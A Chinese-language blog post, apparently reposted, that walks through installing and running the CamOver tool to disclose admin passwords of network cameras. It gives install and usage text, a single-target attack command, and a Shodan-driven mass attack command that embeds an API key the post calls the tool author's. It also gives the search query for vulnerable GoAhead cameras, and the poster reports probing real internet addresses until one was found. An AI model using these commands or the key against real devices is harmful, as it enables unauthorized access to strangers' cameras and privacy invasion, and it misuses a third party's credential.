【漏洞】Camover攝像頭利用(復現)


Camover攝像頭利用

參考鏈接:https://mp.weixin.qq.com/s/sw4wNJisQ-uV0XoHLSfKKw
項目地址:https://github.com/EntySec/CamOver

安裝camover

pip3 install git+https://github.com/EntySec/CamOver

camover使用指南

使用方法: camover [-h] [-t] [-o OUTPUT] [-i INPUT] [-a ADDRESS] 。
               [--shodan SHODAN] [--zoomeye ZOOMEYE] [-p PAGES]。

CamOver是一個利用攝像機的工具,可以披露網絡攝像機的管理密碼。
攝像機管理密碼。

可選參數。
  -h, --help 顯示此幫助信息並退出
  -t, --線程 使用線程以最快速度工作。
  -o OUTPUT, --output OUTPUT
                        將結果輸出到文件。
  -i INPUT, --input INPUT
                        輸入地址的文件。
  -a ADDRESS, --address ADDRESS
                        單個地址。
  --shodan SHODAN Shodan API密鑰,用於通過互聯網利用設備。
                        互聯網上的設備。
  --zoomeye ZOOMEYE ZoomEye API密鑰,用於利用互聯網上的設備。
                        互聯網上的設備。
  --p PAGES, --pages PAGES
                        你想從ZoomEye獲得的頁面數量。

使用camover

單點攻擊

camover -a 192.168.101.2

這是里是失敗時的樣子

通過網絡遠程攻擊

camover可以使用 Shodan 搜索引擎來搜索並攻擊網絡上的攝像頭,使用 -t 參數來設置多線程數量以獲得更好的性能:
camover -t --shodan PSKINdQe1GyxGgecYz2191H2JoS9qvgD

這個api是作者的,竟然能用,互聯網共享精神,respect!

搜尋原理

通過翻看文件,發現查找的關鍵詞
query='GoAhead 5ccc069c403ebaf9f0171e9517f40e41'

在zoomeye搜索,也能得到同樣的效果(剛買的fofa搜不到,差評)

然后翻看代碼發現,只要是用戶名不是admin的都是非脆弱的(😓)

然后通過撞大運的方式發現一個用戶名是admin的地址



免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM